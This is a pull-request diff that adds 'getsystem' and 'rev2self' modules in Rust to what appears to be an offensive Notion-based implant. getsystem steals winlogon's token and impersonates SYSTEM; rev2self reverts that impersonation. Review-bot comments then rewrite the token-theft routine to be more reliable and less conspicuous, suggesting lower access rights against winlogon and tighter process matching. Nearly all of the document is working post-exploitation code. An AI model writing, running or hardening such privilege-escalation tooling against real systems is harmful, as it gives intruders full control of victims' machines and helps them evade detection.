Merge pull request #117 from mttaggart/taggart
getsystem/rev2self
Showing
4 changed files
with
243 additions
and
34 deletions.
@@ -0,0 +1,99 @@ | ||
#[cfg(windows)] use windows::{ | ||
core::{PSTR, PWSTR, PCWSTR}, | ||
Win32::{ | ||
Foundation::{ | ||
CloseHandle, | ||
HANDLE | ||
}, | ||
System::Threading::{ | ||
GetCurrentProcess, | ||
OpenProcessToken, | ||
OpenProcess, | ||
PROCESS_ALL_ACCESS | ||
}, | ||
Security::{ | ||
GetTokenInformation, | ||
DuplicateToken, | ||
ImpersonateLoggedOnUser, | ||
SecurityImpersonation, | ||
TokenElevation, | ||
TOKEN_ELEVATION, | ||
TOKEN_QUERY, | ||
TOKEN_DUPLICATE | ||
} | ||
} | ||
}; | ||
|
||
#[cfg(windows)] use std::mem; | ||
#[cfg(windows)] use std::ffi::c_void; | ||
#[cfg(windows)] use libc; | ||
#[cfg(windows)] use sysinfo::{ProcessExt, PidExt, System, SystemExt, Pid, Process}; | ||
#[cfg(windows)] use whoami; | ||
use std::error::Error; | ||
use litcrypt::lc; | ||
#[cfg(windows)] use crate::cmd::getprivs::is_elevated; | ||
use crate::logger::{Logger, log_out}; | ||
use crate::cmd::notion_out; | ||
|
||
#[cfg(windows)] | ||
fn get_processes(proc_name: &str) -> Vec<(u32, String)> { | ||
let sys = System::new_all(); | ||
sys.processes() | ||
.iter() | ||
.filter(|(_, n) | { | ||
n.name().to_lowercase().contains(proc_name) | ||
}) | ||
.map(|(p, n)| { | ||
(p.as_u32(), n.name().to_owned()) | ||
}) | ||
.collect() | ||
} | ||
|
||
/// Lists processes. Returns PID and process name. | ||
pub async fn handle(logger: &Logger) -> Result<String, Box<dyn Error>> { | ||
#[cfg(windows)] { | ||
if is_elevated() { | ||
unsafe { | ||
logger.info(log_out!("Elevated! Let's get that SYSTEM")); | ||
|
||
let mut winlogon_token_handle = HANDLE(0); | ||
let mut duplicate_token_handle = HANDLE(0); | ||
let winlogon_processes = get_processes("winlogon"); | ||
if winlogon_processes.is_empty() { | ||
return notion_out!("Couldn't find winlogon!"); | ||
} | ||
let winlogon_pid: u32 = winlogon_processes[0].0; | ||
logger.debug(log_out!("Winlogon pid: ", winlogon_pid.to_string().as_str())); | ||
// OpenProcess | ||
let winlogon_proc_handle = OpenProcess(PROCESS_ALL_ACCESS, false, winlogon_pid); | ||
// OpenProcessToken | ||
if OpenProcessToken(winlogon_proc_handle, TOKEN_DUPLICATE, &mut winlogon_token_handle).0 != 0 { | ||
} else { | ||
return notion_out!("[!] Couldn't get Winlogon Token!"); | ||
} | ||
// Duplicate Token | ||
if DuplicateToken(winlogon_token_handle, SecurityImpersonation, &mut duplicate_token_handle).0 != 0 { | ||
logger.debug(log_out!("Duplicated Token!")); | ||
} else { | ||
return notion_out!("[!] Couldn't duplicate token!"); | ||
} | ||
// ImpersonateLoggedOnUser | ||
if ImpersonateLoggedOnUser(duplicate_token_handle).0 != 0 { | ||
logger.info(log_out!("Impersonated!")); | ||
CloseHandle(winlogon_proc_handle); | ||
return notion_out!("I am now ", whoami::username().as_str()); | ||
} | ||
return notion_out!("Couldn't get system!"); | ||
// Close Handles | ||
// CloseHandle(duplicate_token_handle); | ||
|
||
} | ||
|
||
} else { | ||
notion_out!("[!] You ain't got da JUICE!") | ||
} | ||
} | ||
#[cfg(not(windows))] { | ||
notion_out!("This module only works on Windows!") | ||
} | ||
} |
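Review bot: The value returned by `OpenProcess` at the `// OpenProcess` line is never checked before it is handed to `OpenProcessToken`, and the three handles leak on every early return — the `// Close Handles` / `CloseHandle(duplicate_token_handle)` lines sit after an unconditional `return` and are dead, while the success path closes only the process handle. `PROCESS_ALL_ACCESS` is also more than `OpenProcessToken` needs (`PROCESS_QUERY_INFORMATION` is enough) and a louder request against winlogon than necessary. Since the thread keeps its own reference once `ImpersonateLoggedOnUser` succeeds, both token handles can be closed right away, so the whole sequence can be written with cleanup on every path as below (add `PROCESS_QUERY_INFORMATION` to the `System::Threading` import; the `.0 == 0` test assumes this crate version returns a raw `HANDLE`, as the call site implies). Two further points worth a look: `ImpersonateLoggedOnUser` affects only the calling OS thread, so if this `async fn` runs on a multi-threaded executor the impersonation may not be in effect on whichever worker thread later runs rev2self; and `contains("winlogon")` on a lowercased name plus `[0]` of an unordered process map will happily pick a decoy `winlogon`-named process, where `n.name().eq_ignore_ascii_case("winlogon.exe")` is tighter.
```rust
// … unchanged: elevation check and winlogon lookup …
// Only the access OpenProcessToken needs; ALL_ACCESS is more than required.
let winlogon_proc_handle = OpenProcess(PROCESS_QUERY_INFORMATION, false, winlogon_pid);
if winlogon_proc_handle.0 == 0 {
    return notion_out!("[!] Couldn't open winlogon!");
}
let mut winlogon_token_handle = HANDLE(0);
let opened = OpenProcessToken(winlogon_proc_handle, TOKEN_DUPLICATE, &mut winlogon_token_handle).0 != 0;
CloseHandle(winlogon_proc_handle); // not needed once the token was (or was not) obtained
if !opened {
    return notion_out!("[!] Couldn't get Winlogon Token!");
}
let mut duplicate_token_handle = HANDLE(0);
let duplicated = DuplicateToken(winlogon_token_handle, SecurityImpersonation, &mut duplicate_token_handle).0 != 0;
CloseHandle(winlogon_token_handle);
if !duplicated {
    return notion_out!("[!] Couldn't duplicate token!");
}
logger.debug(log_out!("Duplicated Token!"));
let impersonated = ImpersonateLoggedOnUser(duplicate_token_handle).0 != 0;
// The thread now holds its own reference to the impersonation token; the handle can go.
CloseHandle(duplicate_token_handle);
if impersonated {
    logger.info(log_out!("Impersonated!"));
    return notion_out!("I am now ", whoami::username().as_str());
}
notion_out!("Couldn't get system!")
```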
@@ -0,0 +1,37 @@ | ||
#[cfg(windows)] use windows::{ | ||
Win32::{ | ||
Foundation::{ | ||
BOOL, | ||
}, | ||
Security::{ | ||
RevertToSelf | ||
} | ||
} | ||
}; | ||
#[cfg(windows)] use whoami; | ||
use std::error::Error; | ||
use litcrypt::lc; | ||
use crate::logger::{Logger, log_out}; | ||
use crate::cmd::notion_out; | ||
|
||
/// Reverts to self if impersonated | ||
pub async fn handle() -> Result<String, Box<dyn Error>> { | ||
|
||
#[cfg(windows)] { | ||
let username = whoami::username(); | ||
if username == "SYSTEM" { | ||
unsafe { | ||
if RevertToSelf().0 == 1 { | ||
return notion_out!("Reverted to Self: ", whoami::username().as_str()); | ||
} else { | ||
return notion_out!("Could not revert"); | ||
} | ||
} | ||
} | ||
notion_out!("Not SYSTEM, no reason to revert!") | ||
} | ||
|
||
#[cfg(not(windows))] { | ||
notion_out!("This module only works on Windows!") | ||
} | ||
} |
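Review bot: The `username == "SYSTEM"` guard at the top of the Windows branch is the wrong test for "is this thread impersonating": the well-known SYSTEM account name is localized on non-English installs (e.g. `SYSTÈME`), and an impersonation of any non-SYSTEM token is skipped too, leaving the thread impersonating after the command reports "no reason to revert". `RevertToSelf` is harmless on a thread that holds no impersonation token, so the simplest fix is to drop the guard and always call it — `unsafe { if RevertToSelf().0 != 0 { return notion_out!("Reverted to Self: ", whoami::username().as_str()); } }` — or, if the message is wanted, detect a thread token with `OpenThreadToken` (needs importing) rather than a name compare. Minor: `RevertToSelf().0 == 1` should be the non-zero test `RevertToSelf().0 != 0` (or `.as_bool()`) as the getsystem module does, since a BOOL success is any non-zero value. Same caveat as getsystem: `RevertToSelf` affects only the calling OS thread, so on a multi-threaded async executor this may run on a different worker thread from the one that impersonated.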